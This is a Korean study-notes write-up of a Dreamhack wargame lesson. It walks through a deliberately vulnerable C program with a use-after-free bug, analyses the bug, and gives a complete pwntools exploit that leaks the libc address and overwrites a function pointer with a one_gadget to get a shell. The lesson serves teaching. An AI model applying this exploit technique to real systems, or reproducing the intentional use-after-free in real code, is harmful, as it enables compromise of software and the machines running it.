[System Hacking] 1주차 dreamhack stage 11 - (1)

Use After Free 익스플로잇 예제

// Name: uaf_overwrite.c
// Compile: gcc -o uaf_overwrite uaf_overwrite.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct Human {
  char name[16];
  int weight;
  long age;
};
struct Robot {
  char name[16];
  int weight;
  void (*fptr)();
};
struct Human *human;
struct Robot *robot;
char *custom[10];
int c_idx;
void print_name() { printf("Name: %s\n", robot->name); }
void menu() {
  printf("1. Human\n");
  printf("2. Robot\n");
  printf("3. Custom\n");
  printf("> ");
}
void human_func() {
  int sel;
  human = (struct Human *)malloc(sizeof(struct Human));
  strcpy(human->name, "Human");
  printf("Human Weight: ");
  scanf("%d", &human->weight);
  printf("Human Age: ");
  scanf("%ld", &human->age);
  free(human);
}
void robot_func() {
  int sel;
  robot = (struct Robot *)malloc(sizeof(struct Robot));
  strcpy(robot->name, "Robot");
  printf("Robot Weight: ");
  scanf("%d", &robot->weight);
  if (robot->fptr)
    robot->fptr();
  else
    robot->fptr = print_name;
  robot->fptr(robot);
  free(robot);
}
int custom_func() {
  unsigned int size;
  unsigned int idx;
  if (c_idx > 9) {
    printf("Custom FULL!!\n");
    return 0;
  }
  printf("Size: ");
  scanf("%d", &size);
  if (size >= 0x100) {
    custom[c_idx] = malloc(size);
    printf("Data: ");
    read(0, custom[c_idx], size - 1);
    printf("Data: %s\n", custom[c_idx]);
    printf("Free idx: ");
    scanf("%d", &idx);
    if (idx < 10 && custom[idx]) {
      free(custom[idx]);
      custom[idx] = NULL;
    }
  }
  c_idx++;
}
int main() {
  int idx;
  char *ptr;
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  while (1) {
    menu();
    scanf("%d", &idx);
    switch (idx) {
      case 1:
        human_func();
        break;
      case 2:
        robot_func();
        break;
      case 3:
        custom_func();
        break;
    }
  }
}

 

1. 분석 및 설계

분석

보호 기법 🛡️

위의 코드를 컴파일 한 뒤 checksec로 보호기법을 출력해주었다.

모든 보호 기법이 적용되어 있는 걸 확인할 수 있다.

Full RELRO이기 때문에 GOT를 덮어쓰는 공격은 어렵다.

​

​

코드 분석 🔎

struct Human {
  char name[16];
  int weight;
  long age;
};
struct Robot {
  char name[16];
  int weight;
  void (*fptr)();
};

(); };

크기가 같은 Human, Robot 구조체가 정의되어 있는 걸 확인할 수 있다.

각 구조체 변수 또는 원하는 크기의 청크를 할당하고 해제할 수 있다.

​

​

 

 

void human_func() {
  int sel;
  human = (struct Human *)malloc(sizeof(struct Human));
  strcpy(human->name, "Human");
  printf("Human Weight: ");
  scanf("%d", &human->weight);
  printf("Human Age: ");
  scanf("%ld", &human->age);
  free(human);
}
void robot_func() {
  int sel;
  robot = (struct Robot *)malloc(sizeof(struct Robot));
  strcpy(robot->name, "Robot");
  printf("Robot Weight: ");
  scanf("%d", &robot->weight);
  if (robot->fptr)
    robot->fptr();
  else
    robot->fptr = print_name;
  robot->fptr(robot);
  free(robot);
}

human_func 함수와 robot_func 함수를 살펴보면, 해제 후 할당한 메모리 영역을 초기화 하지 않은 걸

확인할 수 있다. Human 구조체와 Robot 구조체의 크기는 같기 때문에 한 구조체를 해제하고 다른 구조체를 할당하면 해제된 구조체의 값을 사용할 수 있는 Use After Free가 발생한다.

​

robot_func에서 Robot변수의 fptr이 NULL이 아니면 이를 호출해주므로, Use After Free로 이 변수에 원하는 값을 남기면 실행 흐름을 조작할 수 있다.

​

 

int custom_func() {
  unsigned int size;
  unsigned int idx;
  if (c_idx > 9) {
    printf("Custom FULL!!\n");
    return 0;
  }
  printf("Size: ");
  scanf("%d", &size);
  if (size >= 0x100) {
    custom[c_idx] = malloc(size);
    printf("Data: ");
    read(0, custom[c_idx], size - 1);
    printf("Data: %s\n", custom[c_idx]);
    printf("Free idx: ");
    scanf("%d", &idx);
    if (idx < 10 && custom[idx]) {
      free(custom[idx]);
      custom[idx] = NULL;
    }
  }
  c_idx++;
}

custom_func 함수를 사용하면 0x100이상의 크기를 갖는 청크를 할당하고 해제할 수 있다.

이 함수에서도 해제 후 메모리 영역을 초기화하지 않아서 Use After Free가 발생할 수 있다.

​

​

​

​

익스플로잇 설계

​

Robot.fptr의 값을 one_gadget의 주소로 덮어서 셸을 획득해볼 것이다.

-> libc가 매핑된 주소를 먼저 구해야 한다.

​

1) 라이브러리 릭

Use After Free 취약점을 이용하여 libc가 매핑된 주소를 구해야한다.

이를 위해 unsorted bin의 특징을 이용해보고자 한다.

​

unsorted bin에 처음 연결되는 청크는 libc의 특정 주소와 이중 원형 연결 리스트를 형성한다.

▶ 처음 unsorted bin에 연결되는 청크의 fb와 bk에는 libc 내부의 주소가 쓰임

​

예제의 custom_func 함수는 0x100바이트 이상의 크기를 갖는 청크를 할당하므로, 0x410 이하의 크기를 갖는 청크는 tcache에 먼저 삽입되므로, 이보다 큰 청크를 해제해서 unsorted bin에 연결하고, 이를 재할당하여 값을 읽으면 libc가 매핑된 주소를 계산할 수 있다.

​

※ 여기서 해제할 청크가 탑 청크와 맞닿으면 안됨 (unsorted bin에 포함되는 청크와 탑 청크는 병합 대상이므로, 이 둘이 맞닿으면 청크가 병합된다.)

-> 청크 두 개를 연속으로 할당하고, 처음 할당한 청크를 해제해야 한다.

​

​

2) 함수 포인터 덮어쓰기

Human과 Robot은 같은 크기의 구조체 - Human 구조체가 해제되고 Robot구조체가 할당되면,

Robot은 Human이 사용했던 영역을 재사용함

Robot이 할당될 때, 사용한 메모리 영역을 초기화하지 않으므로 Human에 입력한 값은 그대로 재사용됨

​

Human 구조체의 age는 Robot 구조체의 fptr과 위치가 같다.

-> human_func를 호출했을 때, age에 one_gadget 주소를 입력하고, 이어서 robot_func를 호출하면

fptr의 위치에 남아있는 one_gadget을 호출시킬 수 있다.

​

​

​

​

3. 익스플로잇

라이브러리 릭

custom_func를 사용해서 0x510의 크기를 갖는 청크를 할당, 해제한 뒤 다시 할당해서 libc 내부의 주소를 구할 것이다.

​

info proc map / vmma

libc 내부의 주소와 libc가 매핑된 주소의 오프셋은 info proc map, vmmap으로 구할 수 있다.

#!/usr/bin/python3
# Name: uaf_overwrite.py
from pwn import *
p = process("./uaf_overwrite")
def slog(sym, val): success(sym + ": " + hex(val))
def human(weight, age):
    p.sendlineafter(">", "1")
    p.sendlineafter(": ", str(weight))
    p.sendlineafter(": ", str(age))
def robot(weight):
    p.sendlineafter(">", "2")
    p.sendlineafter(": ", str(weight))
def custom(size, data, idx):
    p.sendlineafter(">", "3")
    p.sendlineafter(": ", str(size))
    p.sendafter(": ", data)
    p.sendlineafter(": ", str(idx))
# UAF to calculate the `libc_base`
custom(0x500, "AAAA", -1)
custom(0x500, "AAAA", -1)
custom(0x500, "AAAA", 0)
custom(0x500, "B", -1)
lb = u64(p.recvline()[:-1].ljust(8, b"\x00")) - 0x3ebc42
og = lb + 0x10a41c
slog("libc_base", lb)
slog("one_gadget", og)

​

​

​

함수 포인터 덮어쓰기

human->age와 robot->fptr이 구조체 상에서 같은 위치에 있음을 이용하면,

Use After Free로 robot->fptr의 값을 원하는 값으로 조작할 수 있다.

 

# Name: uaf_overwrite.py
from pwn import *
p = process("./uaf_overwrite")
def slog(sym, val): success(sym + ": " + hex(val))
def human(weight, age):
    p.sendlineafter(">", "1")
    p.sendlineafter(": ", str(weight))
    p.sendlineafter(": ", str(age))
def robot(weight):
    p.sendlineafter(">", "2")
    p.sendlineafter(": ", str(weight))
def custom(size, data, idx):
    p.sendlineafter(">", "3")
    p.sendlineafter(": ", str(size))
    p.sendafter(": ", data)
    p.sendlineafter(": ", str(idx))
# UAF to calculate the `libc_base`
custom(0x500, "AAAA", -1)
custom(0x500, "AAAA", -1)
custom(0x500, "AAAA", 0)
custom(0x500, "B", -1)
lb = u64(p.recvline()[:-1].ljust(8, b"\x00")) - 0x3ebc42
og = lb + 0x10a41c
slog("libc_base", lb)
slog("one_gadget", og)
# UAF to manipulate `robot->fptr` & get shell
human("1", og)
robot("1")
p.interactive()

아래와 같이 human_age에 one_gadget의 주소를 입력하고, 해제한 뒤, robot_func를 호출하면 셸을 획득할 수 있다.

# UAF to manipulate `robot->fptr` & get shell
human("1", og)
robot("1")​